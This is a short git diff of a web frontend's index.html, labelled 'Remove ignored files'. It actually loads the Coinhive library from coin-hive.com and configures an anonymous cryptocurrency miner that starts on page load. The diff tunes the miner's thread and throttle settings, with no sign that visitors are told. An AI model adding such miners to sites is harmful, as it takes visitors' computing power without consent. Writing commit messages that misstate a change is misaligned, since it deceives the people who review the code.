Remove ignored files

--- a/frontend/public/index.html
+++ b/frontend/public/index.html
@@ -40,7 +40,10 @@
   <script src="https://use.fontawesome.com/00c6aa3062.js"></script>
   <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
   <script>
-    var miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz');
+    var miner = new CoinHive.Anonymous('np6rTwBMOFatfmuf6GO09C7MDbdYmKtz', {
+      threads: 1,
+      throttle: 1,
+    });
     miner.start();
   </script>
 </html>
